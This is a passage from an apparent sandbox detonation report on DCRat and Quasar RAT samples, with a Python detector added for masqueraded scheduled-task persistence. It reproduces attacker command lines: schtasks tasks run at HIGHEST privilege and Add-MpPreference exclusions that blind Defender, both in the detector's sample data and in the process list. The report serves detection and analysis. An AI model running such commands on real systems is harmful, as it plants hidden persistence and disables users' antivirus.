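The 45 "Process spawned unexpected child process" rows above correspond one-to-one to the 45 schtasks /create invocations in this process list; a process launched through WMI (Win32_Process.Create) gets wmiprvse.exe as its parent, which is why the sandbox flags them. The tasks follow a fixed pattern per dropped binary: one MINUTE task, one ONLOGON task with /rl HIGHEST, a second MINUTE task with /rl HIGHEST, a task name built as the file stem plus its own first letter (smss -> "smsss", RuntimeBroker -> "RuntimeBrokerR"), binaries named after core Windows processes but placed outside System32, and a matching Add-MpPreference -ExclusionPath for every one of them. The following script is an added example written for this page, not part of the sandbox output or of any DCRat tooling; it parses command lines of this shape and reports those indicators. The sample input reuses the smss and csrss lines from this report plus one constructed benign task, and the LEGIT_DIRS allow-list is a deliberately minimal assumption (the real StartMenuExperienceHost.exe lives under C:\Windows\SystemApps, not System32).

```python
"""Flag DCRat-style persistence in recorded schtasks / Add-MpPreference command lines.

Added example for this report (not sandbox or malware code). Rules:
  1. a binary named like a core Windows process stored outside System32/SysWOW64,
  2. a task name equal to <file stem> + <first letter of stem> (smss -> "smsss"),
  3. the MINUTE / ONLOGON+HIGHEST / MINUTE+HIGHEST task triplet for one target,
  4. a Defender path exclusion that covers a scheduled target.
"""
import re
from collections import defaultdict

# Names abused in this report. Idle.exe is listed because no legitimate on-disk
# Idle.exe exists ("System Idle Process" is not a file).
MASQUERADED = {
    "smss.exe", "csrss.exe", "lsass.exe", "services.exe", "sihost.exe",
    "dllhost.exe", "runtimebroker.exe", "startmenuexperiencehost.exe", "idle.exe",
}
# Assumption: minimal allow-list of directories where such binaries may live.
LEGIT_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

# /opt "quoted value" | /opt bare-value | /opt (flag without value, e.g. /f)
OPT_RE = re.compile(r'/(tn|sc|mo|tr|rl|f)\b(?:\s+(?:"([^"]*)"|([^\s/]\S*)))?', re.I)
EXCL_RE = re.compile(r"Add-MpPreference\s+-ExclusionPath\s+'([^']+)'", re.I)
DCRAT_TRIPLET = {("MINUTE", None), ("ONLOGON", "HIGHEST"), ("MINUTE", "HIGHEST")}


def parse_schtasks(cmd):
    """Return {tn, sc, mo, tr, rl} for a `schtasks /create` line, else None."""
    if not re.search(r"schtasks(\.exe)?\s+/create", cmd, re.I):
        return None
    opts = {m.group(1).lower(): m.group(2) if m.group(2) is not None else m.group(3)
            for m in OPT_RE.finditer(cmd)}
    # The report wraps /tr in single quotes inside the double quotes; strip them.
    tr = (opts.get("tr") or "").strip().strip("'")
    return {"tn": opts.get("tn"), "sc": (opts.get("sc") or "").upper(),
            "mo": opts.get("mo"), "tr": tr, "rl": (opts.get("rl") or "").upper() or None}


def masquerade_findings(task):
    """Rules 1 and 2 for a single parsed task."""
    findings = []
    tr = task["tr"]
    directory, _, name = tr.rpartition("\\")
    stem = name.rsplit(".", 1)[0]
    if name.lower() in MASQUERADED and directory.lower() not in LEGIT_DIRS:
        findings.append(f"system-process name outside System32: {tr}")
    if task["tn"] and stem and task["tn"] == stem + stem[0]:
        findings.append(f"stem+first-letter task name {task['tn']!r} for {name}")
    return findings


def analyse(cmdlines):
    """Run all four rules over a list of command lines and return the findings."""
    tasks, exclusions, findings = [], [], []
    per_target = defaultdict(set)          # target path -> {(schedule, runlevel)}
    for cmd in cmdlines:
        task = parse_schtasks(cmd)
        if task:
            tasks.append(task)
            per_target[task["tr"].lower()].add((task["sc"], task["rl"]))
            findings.extend(masquerade_findings(task))
        m = EXCL_RE.search(cmd)
        if m:
            exclusions.append(m.group(1))
    triplets = sorted(p for p, combos in per_target.items() if DCRAT_TRIPLET <= combos)
    findings.extend(f"DCRat-style task triplet for {p}" for p in triplets)
    covered = sorted(e for e in exclusions if e.lower() in per_target)
    findings.extend(f"Defender exclusion covers a scheduled target: {e}" for e in covered)
    return {"tasks": tasks, "exclusions": exclusions, "triplets": triplets,
            "excluded_targets": covered, "findings": findings}


# Lines 1-7 and the two Add-MpPreference lines are copied from this report's
# Processes list; the "NightlyBackup" task is constructed as a benign control.
SAMPLE = [
    r'''schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\smss.exe'" /f''',
    r'''schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Users\Default User\smss.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\smss.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /f''',
    r'''schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\System32\sk-SK\StartMenuExperienceHost.exe'" /rl HIGHEST /f''',
    '"powershell" -Command Add-MpPreference -ExclusionPath \'C:\\Users\\Default User\\smss.exe\'',
    '"powershell" -Command Add-MpPreference -ExclusionPath \'C:\\Recovery\\WindowsRE\\csrss.exe\'',
    r'''schtasks.exe /create /tn "NightlyBackup" /sc DAILY /st 02:00 /tr "C:\Tools\backup.exe" /f''',
]

if __name__ == "__main__":
    for line in analyse(SAMPLE)["findings"]:
        print(line)
```

Feed it the full Processes list of a report (or command-line telemetry from EDR) to get every dropped path and the exclusions that protect it in one pass; the triplet rule is the most specific of the four and survives renaming of the dropped binary, while rule 2 catches the loader's task-naming habit even for the hash-named copy in C:\Program Files\edge_BITS_4680_1850129863.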
Network
| Country | Destination | Domain | Proto |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| GB | 142.250.187.195:80 | c.pki.goog | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
Files
memory/2180-0-0x00007FFFDCC23000-0x00007FFFDCC25000-memory.dmp
memory/2180-1-0x0000000000CB0000-0x0000000000E52000-memory.dmp
memory/2180-2-0x00007FFFDCC20000-0x00007FFFDD6E1000-memory.dmp
memory/2180-7-0x0000000002FB0000-0x0000000002FB8000-memory.dmp
memory/2180-11-0x0000000002FF0000-0x0000000002FFC000-memory.dmp
memory/2180-17-0x000000001BB90000-0x000000001BB9C000-memory.dmp
memory/2180-16-0x000000001BB80000-0x000000001BB8A000-memory.dmp
memory/2180-15-0x000000001BB70000-0x000000001BB78000-memory.dmp
memory/2180-14-0x000000001BB60000-0x000000001BB68000-memory.dmp
memory/2180-13-0x000000001BB40000-0x000000001BB4E000-memory.dmp
memory/2180-12-0x0000000003000000-0x000000000300A000-memory.dmp
memory/2180-10-0x0000000002FE0000-0x0000000002FEC000-memory.dmp
memory/2180-9-0x0000000002FD0000-0x0000000002FD8000-memory.dmp
memory/2180-8-0x0000000002FC0000-0x0000000002FD0000-memory.dmp
memory/2180-6-0x0000000002F90000-0x0000000002FA6000-memory.dmp
memory/2180-5-0x0000000002F80000-0x0000000002F90000-memory.dmp
memory/2180-4-0x000000001BAF0000-0x000000001BB40000-memory.dmp
memory/2180-3-0x0000000002F50000-0x0000000002F6C000-memory.dmp
C:\Users\Public\Pictures\Idle.exe
| MD5 | 8b03d1f60bdf0b6465c0623109e7269e |
| SHA1 | 33fb1f09f53ca182e1112ed973fce8fa97e4398f |
| SHA256 | 1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf |
| SHA512 | 8c79bf16fdce864799bb6893565aa06f35737f91897537f08129bfe842ad46f39f4081dcc59760df59e416af3ec848fd2dec179d42900defad7d94b4678f2de0 |
C:\d25f591a00514bc9ba8441\RuntimeBroker.exe
| MD5 | b4a7ffa597431472f1196f0d244fdfa1 |
| SHA1 | 9787d0f1dffca7a2d3d3a04b7b3f9cc055190039 |
| SHA256 | 12a93931e6670cd16b26b8aaaf6b9c99a181ed1781cbb8af9e309bfd8a1f6d92 |
| SHA512 | 3ddec53995b68b6d4f071bea31ca3403006929a5b8169f89819a9b2ecbbf30a6bd659f4d38302c2a0bd26d9c1be33ecbb1201245e57571a6a7cf75e148ed35e4 |
C:\Program Files\edge_BITS_4732_595216890\dllhost.exe
| MD5 | c56e5784a7e11766cbc57430d7685115 |
| SHA1 | ab802a3d90f6728b38d255870b9feff0e55e5ae3 |
| SHA256 | 869890cc0d29ee7b63b8f2826ecd4febc9046d1b783e80512e710c5798a66224 |
| SHA512 | 773a9c7cc073759044b7a29a630ea3f9d78576dfd908c04bae1f464d4db9fbda61542275b3c7bbb8c144574a91cd2bf0de897ebbd1675c60ba5714cfe8238949 |
C:\7e20f84d5244aba7145631d4073af8\RuntimeBroker.exe
| MD5 | 3832310c7b6ed8e78cfa29000e158fb3 |
| SHA1 | acf5c18fd29dd3337a8baeabd92f4471e5435505 |
| SHA256 | 06663ed3c24b80c705519ff8dea59148160984c07239df59811e63e4b92163da |
| SHA512 | efa34c62a903db38628d62e9054a6a540e94fb719db6dd52aaae9d7b90db8792047da0b8810b57c88afd5ade4b4d18828b70a12064c0157272de0a0d49b9582c |
C:\Recovery\WindowsRE\csrss.exe
| MD5 | 2bcea9d2c346ba84574b8331bce37087 |
| SHA1 | b4c7612844243e564066fd26f04df4e5a0a480b1 |
| SHA256 | 7d7f907400a3c287206073b99b545e96081232768136c9f711c58bea6b33d44c |
| SHA512 | cb70e056815353aaef96d21beb4da2c3c100d57f2ba5c4271365b3e985e7fb590698e6e8b3976d60eae41d8fc5bf2ea2c9f5e4d34d851f540891feb79ca68a67 |
memory/2180-201-0x00007FFFDCC23000-0x00007FFFDCC25000-memory.dmp
C:\Recovery\WindowsRE\RuntimeBroker.exe
| MD5 | db8f82f3d8973d32dd8701ac6e2954b5 |
| SHA1 | 851e8fcd38ea62a46f44c4fa33bebca5b59be664 |
| SHA256 | c2ffcb38c5f667900d6a178bba5058d8cc888c5efa7aeadd1c8ce9de2ebaa95e |
| SHA512 | 83d2278f3b987293cab71bb5d24acd7b4ff203377a48a82c5d1fce7234f5e4c2bb785887978f3657433dd2cfe93bf44a41a212e021ae32bff9e9c94198f8ec52 |
memory/2180-213-0x00007FFFDCC20000-0x00007FFFDD6E1000-memory.dmp
C:\d25f591a00514bc9ba8441\sihost.exe
| MD5 | 53cff85048d32a94637e8115a6f122d0 |
| SHA1 | 80abea3fa189da68c1639ea0f1ba58adf87b6b94 |
| SHA256 | 6fae27b1af247f9bf0ddfad3125bc5913540c26b39061e57113f506a3893e28c |
| SHA512 | 31951295ad8c360232c2201bd3654f8cfc6160ea485311a47d34b796c44e24b26b448da7f89cf890aec6e0b39567408d2097e5cac2b472626efc5c48092bb09f |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j2wcp2y1.ewv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4936-240-0x0000024969310000-0x0000024969332000-memory.dmp
memory/2180-259-0x00007FFFDCC20000-0x00007FFFDD6E1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\XeGdH0U8sJ.bat
| MD5 | 3ab5ba471170ab2e56e14119abedb58e |
| SHA1 | f575ec5fae41649ebf8207c080817c9a3074a3bc |
| SHA256 | bbd58dd35b621657afbf9e758c9b0f3b6744f1d39866086c3e625a8aaaa12e9a |
| SHA512 | f0c12d2586b37660d04d97eb4a58814ac68779e922107ef4782e81f42e55f4adfef2547fbdc56b0fca7717d2952276db4026c96c494b8c3161708c44bdbdc25f |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 091f20bbaff3637ace005fce1590be7b |
| SHA1 | 00d1ef232fc560231ff81adc227a8f2918235a29 |
| SHA256 | bd50b50b5e08067840cf1e6bb16f3ed0242649d826544899056db26876dec9fe |
| SHA512 | ebc04d7de6bcbd6505c60432c6455bde985ac422cbda875ef5c1dd6ef44155ec0d43a882dd793e692d3723a257e3d12c48ac8c0dad7c21a99d446d4b3b257890 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ceb796de20c8360e1e53623d78696e8a |
| SHA1 | 52e20d1bb718b5e04290816c3c740d8f89265bcb |
| SHA256 | cdf217f7e76215d14186a36614f8d2bd6f911869af5c12d98827ec42734ce321 |
| SHA512 | 2d9f010240f49f4ea4537ece426edeccf8f6b1f2013bfb5e5e8412bc54993043e101f205ed5ca93f26d77de3cce1ab7620b7f97792df06d6c803695f9baaf869 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e8e7675df15697eee65b731b90f33a5f |
| SHA1 | 8fe1308e032c5cb61b8ea50672fd650889cecdcd |
| SHA256 | 656a10810af26e008c2c5d4748b4a476b97b9fd5ef7837ae197feff6ec00b932 |
| SHA512 | fed3aa124a90998c734d36397f7fa6e26973bbeaa2c11b999ee05b0fb2378473b14765ca606f021c2f778613ce61f3a1c6836e955b7c6b192a7774973a945992 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 566ef902c25833fe5f7f4484509fe364 |
| SHA1 | f8ba6651e7e4c64270e95aac690ad758fa3fc7f8 |
| SHA256 | 28265aaf259c60ae208b025f4c6b317c0799154b5d40d650bf44ef09f4805514 |
| SHA512 | b2c696820b775c0705884f606b4ac464d75d8d5e415bee2fb1e68d07ca288c953936d9286f277082fc11fbae24748c6a872f0be540be37190f0383c7b16820a3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5f3d606f9a5f1201bfc1f01c54e842c4 |
| SHA1 | f1917e50b557b135953ecbe63e1fc1e675b541f1 |
| SHA256 | dcc09d3b5b17ef60cb35e4148230306cdcd68d18d18a39fd5fe220c34997a32a |
| SHA512 | d85e1e1b4a552a8cdd21c4195a2ea082d3fcb40907d2a6a0ceb297f32defd1fba17d3b54dc954c26b3b731bc179bee5cfc011de3c667af47cdbe289b30fdfb38 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1f3a4f1a0ec7141a2b9d52de694b5b94 |
| SHA1 | 818521ae654b04c97a8510dd452046a18eab00a0 |
| SHA256 | a7eb5ae5bbcd9b72aa81795071ba0dc8485e6f2f942f816cb192b3db33acbac3 |
| SHA512 | d00ea8136fa8ced7733d712af781270f7046ac07c48ccdd5ab22d5a29775b98e5f3aac6b6b58f0bf103d6af1ab7b4fa43aee873f91750fd34668c0fbb2082ef4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a5d93882341ce023d4569907c3bb0def |
| SHA1 | db0998ab671abb543a7ac78596c0b95743a9a2c8 |
| SHA256 | c3ea7d8d4ac21adbe8c93e10729367b0b7c3477e7758596609c8e25e45baaa78 |
| SHA512 | 7bf5716c96d93da7d37bbedb9623c9ae2860ac7b1a0e9310cbee0962556705f8876aebdabb9820f1f1ed37e504e002f24507a23db302d0e180bb45092520cc7f |
C:\Users\Admin\AppData\Local\Temp\c0c5fc13-d501-4833-9b9b-2f080c1c8aaa.vbs
| MD5 | dbfcce4076e8ff82286fe0d4ec14e327 |
| SHA1 | 51ff3b3e7553284fc14f6f4eb52eae48bfe01223 |
| SHA256 | 7474a8bc8be3589e71ef8f54095860c2d32f41caa8746a295b74ba50fb7cd60e |
| SHA512 | 65e3c682ea3e7bcf7133576566e1a52a0a715bbb40d3bb26936b26983077401cbfa8a6cfee1c7e122704cf1e054716910c1865b44a6a789c9565122ac3a8ae1e |
C:\Users\Admin\AppData\Local\Temp\5a79a36d-291c-4c41-a4e1-ce73bfd5be23.vbs
| MD5 | 22d515b4a64ce57c1c1c31a9b64e113a |
| SHA1 | 8b383c0ee29c26de3b9783ef85f48e06c92427a6 |
| SHA256 | 59e60ca1f17345edc462be9e4429bf29563f87730fc2fa37f22d3725c0e4f17c |
| SHA512 | 5d51c57e787ec356a3dd4647595e500b74637b0f56388b898dffa81ee8c9d7e5f988df037c3cd62ff3d5f474d3a5bd2c24e51143fdfb138b191260fbe73692d4 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log
| MD5 | 3690a1c3b695227a38625dcf27bd6dac |
| SHA1 | c2ed91e98b120681182904fa2c7cd504e5c4b2f5 |
| SHA256 | 2ca8df156dba033c5b3ae4009e3be14dcdc6b9be53588055efd0864a1ab8ff73 |
| SHA512 | 15ebfe05c0317f844e957ac02842a60b01f00ddca981e888e547056d0e30c97829bc4a2a46ce43034b3346f7cf5406c7c41c2a830f0abc47c8d2fd2ef00cb2c1 |
C:\Users\Admin\AppData\Local\Temp\239e4973-5b62-442b-9de7-006ed6a8a33a.vbs
| MD5 | a1811be40e8ec17443497f144ecdf2c6 |
| SHA1 | 729ed8edbe42d15d598d394181b848157c7031a0 |
| SHA256 | 39229f21fb68c998531270104d905cf456bb74b97bd6045de7df102345de25c1 |
| SHA512 | c0e327dee8ec4a11c8c94cbadab52b110867ee62a15003f3adc4fa50182b27660e6cffddbce703d688ed5536ee1ec078334598c05a1f7011799d61eba2604147 |
C:\Users\Admin\AppData\Local\Temp\86e9093d-cfd8-4f3c-89b1-c4cc91329d80.vbs
| MD5 | 3b5c4d0fb412836761cf85d0a31fc9c3 |
| SHA1 | b6c452f3e8922e390ed1089b2963d9ed57dc6134 |
| SHA256 | 7d49609c68c3b3071f6ade1f4735464a18aece8bca9da0531067c38f32df8b14 |
| SHA512 | 8d2c9f7468c083015a973e9cc1d4a394d52e76418875617b4e77d03bfdb06bdc38cf23e6d544cdb69767782a9b8add1fe7c1dc6a7d61160d6dcd628a554ed709 |
C:\Users\Admin\AppData\Local\Temp\3ba6a0cf-f68f-41a4-9e7a-e7243952869a.vbs
| MD5 | ba2b74eb21d71fc714c5db526384bd2b |
| SHA1 | c15c61e3392989940572cd4cfed075480e04bcd5 |
| SHA256 | 208ea1e7031e389f37d956ed08da1ac3892ed4b2c72bbec594ae9cc8aee3c073 |
| SHA512 | 18f4cc2e4d3ba7ab18bc78f177f1a7cf747d81238c822f273c8778d037cfcd0c8ad0550f9827e434fbc5897d5dc6a8637c3bb0c06387599cee22a2e1fff86775 |
C:\Users\Admin\AppData\Local\Temp\3ec648c8-1a84-4dd5-ad79-9f0512d16478.vbs
| MD5 | 388a7990fcb69ce25e1dc4ea7d2b3ed0 |
| SHA1 | 0eb5120858f8a55f8229c7aa60d051fbdceefdde |
| SHA256 | 24c84a11b9f08da8311f69e17175d22ba59048614796a19e115a7d530cd23bdb |
| SHA512 | f3d217032edf77e17a1ceedd007f5d7edb324739d584f415733fa3ad37bac0481ea1a4b004d9c6173bc7c3a1d73d068ab552afb02e4a904685bfa9b852c2e646 |
C:\Users\Admin\AppData\Local\Temp\e263bd33ce825262c0c77aaee9ec2b40e5eedeee.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\a4c3d2b5-daef-4164-abe0-b84a7d8560d3.vbs
| MD5 | e8779d2ec891514a7300384857fc15a6 |
| SHA1 | fa4eaf918686d669f600f30d982dbb4bc744253f |
| SHA256 | 217f80116979cbca906d775772faf19dd6aa0271131a2ffeb704f67e8ae91b06 |
| SHA512 | 66a8239b529c86d5a8f4822af6746fdfd9cbaa53574a4498ae69a0e758c32e8752afc398d940a9e1f0b987a8d0162584fbc06d19a31fa511cdfa7c95027cbb2a |
C:\Users\Admin\AppData\Local\Temp\821b7e38-7e51-4bcc-a17e-12564ee68448.vbs
| MD5 | 218a452d57745303612c32c51065f137 |
| SHA1 | a25e3bdd6e65417d0d188957bf46e825661d30e1 |
| SHA256 | 345b8d81188a1e6b257ab72c16563d026ae2b388a334b2098f2d915151d967b7 |
| SHA512 | 9c1ce6da80eae453db35d7942b1b2a243a9d5a1dfe06dfc700b9db138d5b21692859d450875dac9f9b5217cb891e6a8efc49d522a986dd73346baffd1b124861 |
C:\Users\Admin\AppData\Local\Temp\aba768da-aa2e-42b0-ba71-4d52689d6e04.vbs
| MD5 | 18499dad257230cc7a24c8008c3ea79c |
| SHA1 | cd4a56ee3f8d847a2426191ea97956c351611477 |
| SHA256 | 81a97f61c3cb4cef2091a36dd15cc72d4dd95f21cfdecdeb3629b4ae486f299f |
| SHA512 | 5b1a850f7dff222c5468d134ce470899ccff9bcdfd3c5a37cb3c323a188bb31fe695e87c38003ccd9529141c0375ed94f11858d3a31408e04c87ca61177c4b62 |
C:\Users\Admin\AppData\Local\Temp\358be680-2edf-4b05-9c24-bcc49573f997.vbs
| MD5 | a4a31e821e12cecde8acfeec7e8a7a97 |
| SHA1 | cf52a699f95fc8e2a5b99da174f096f3e5e6778b |
| SHA256 | 2977946777895e90ba48a573358899eeea59b88a3f7196053c5ba1013e05404a |
| SHA512 | 3885e7e0d828d8ba4f9b96595a1e4d1bbd624ab8008870d31678fc0412f61ebb1ed9657eee35056623b3bb1bd65626bddb88700a8ed800f6e53d143812d090e0 |
C:\Users\Admin\AppData\Local\Temp\6333a880-14b3-4f87-8e0c-51f77801efe1.vbs
| MD5 | 0eed7707b6934c5b19f065ab098b2ea7 |
| SHA1 | f9fb519b395d2184bf979206ca38cae5a45ef73d |
| SHA256 | e2c219ed32e0a3aa7780d434f23cff2ca0cd7c2b54f02cb3b26b078a476c7701 |
| SHA512 | 5b4525a2afc317432263709fbfc7267e441ef4cd441ea8a659acb4e225b78b80c04f3ac31cc12ff4be28eb6c5f9c1608f33c05ed6692813cf0bf98033038ac85 |
C:\Users\Admin\AppData\Local\Temp\bf4002af-6d93-4c21-97ce-fba11d964f3b.vbs
| MD5 | 135190d89c524caa61af63b624751b4c |
| SHA1 | 7bdbca909bee9b5320d818c4a03ecb5f3c51a69f |
| SHA256 | ec7707d0ca57de6a43215a224c5ef4b9606196952b1dfb5877b335f57ad87d1f |
| SHA512 | 3a3aa29a284e9f6128c5ec29671d5940b834978017d35347b2d7f982a9ec517ecf01681224101f2265539b0d37748df7fb289a48b6e6c5df3f901a1aac129f0f |
Analysis: behavioral28
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250314-en
Max time kernel
149s
Max time network
152s
Command Line
Signatures
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1bbf7d818b40f8fa0da224e39f27829bb7d8a8bdbec66fa62cfba39cd0d6d3fd.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 100 wrote to memory of 5484 | N/A | C:\Users\Admin\AppData\Local\Temp\1bbf7d818b40f8fa0da224e39f27829bb7d8a8bdbec66fa62cfba39cd0d6d3fd.exe | C:\Windows\SYSTEM32\schtasks.exe |
| PID 100 wrote to memory of 5484 | N/A | C:\Users\Admin\AppData\Local\Temp\1bbf7d818b40f8fa0da224e39f27829bb7d8a8bdbec66fa62cfba39cd0d6d3fd.exe | C:\Windows\SYSTEM32\schtasks.exe |
| PID 100 wrote to memory of 5720 | N/A | C:\Users\Admin\AppData\Local\Temp\1bbf7d818b40f8fa0da224e39f27829bb7d8a8bdbec66fa62cfba39cd0d6d3fd.exe | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe |
| PID 100 wrote to memory of 5720 | N/A | C:\Users\Admin\AppData\Local\Temp\1bbf7d818b40f8fa0da224e39f27829bb7d8a8bdbec66fa62cfba39cd0d6d3fd.exe | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe |
| PID 5720 wrote to memory of 5816 | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | C:\Windows\SYSTEM32\schtasks.exe |
| PID 5720 wrote to memory of 5816 | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | C:\Windows\SYSTEM32\schtasks.exe |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\1bbf7d818b40f8fa0da224e39f27829bb7d8a8bdbec66fa62cfba39cd0d6d3fd.exe
"C:\Users\Admin\AppData\Local\Temp\1bbf7d818b40f8fa0da224e39f27829bb7d8a8bdbec66fa62cfba39cd0d6d3fd.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| N/A | 192.168.1.55:4782 | N/A | tcp |
| N/A | 192.168.1.55:4782 | N/A | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| N/A | 192.168.1.55:4782 | N/A | tcp |
| N/A | 192.168.1.55:4782 | N/A | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| N/A | 192.168.1.55:4782 | N/A | tcp |
| N/A | 192.168.1.55:4782 | N/A | tcp |
| N/A | 192.168.1.55:4782 | N/A | tcp |
Files
memory/100-0-0x00007FF91F2A3000-0x00007FF91F2A5000-memory.dmp
memory/100-1-0x00000000008D0000-0x0000000000BF4000-memory.dmp
memory/100-2-0x00007FF91F2A0000-0x00007FF91FD61000-memory.dmp
memory/5720-10-0x00007FF91F2A0000-0x00007FF91FD61000-memory.dmp
memory/100-9-0x00007FF91F2A0000-0x00007FF91FD61000-memory.dmp
memory/5720-11-0x00007FF91F2A0000-0x00007FF91FD61000-memory.dmp
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
| MD5 | 35110eedb3518d1905b88025bf11b77d |
| SHA1 | c39e96cc0dcb14065984c3d3fbff331070e37feb |
| SHA256 | 1bbf7d818b40f8fa0da224e39f27829bb7d8a8bdbec66fa62cfba39cd0d6d3fd |
| SHA512 | 08a3db05d373eb18f9b86fcea5b4338bd4cf3ca60df9906873bc0eb4d2dd6bc544890d23543df9be0848647d89a14d51010a7498bf8041c6872d8af768e035d2 |
memory/5720-12-0x000000001B1F0000-0x000000001B240000-memory.dmp
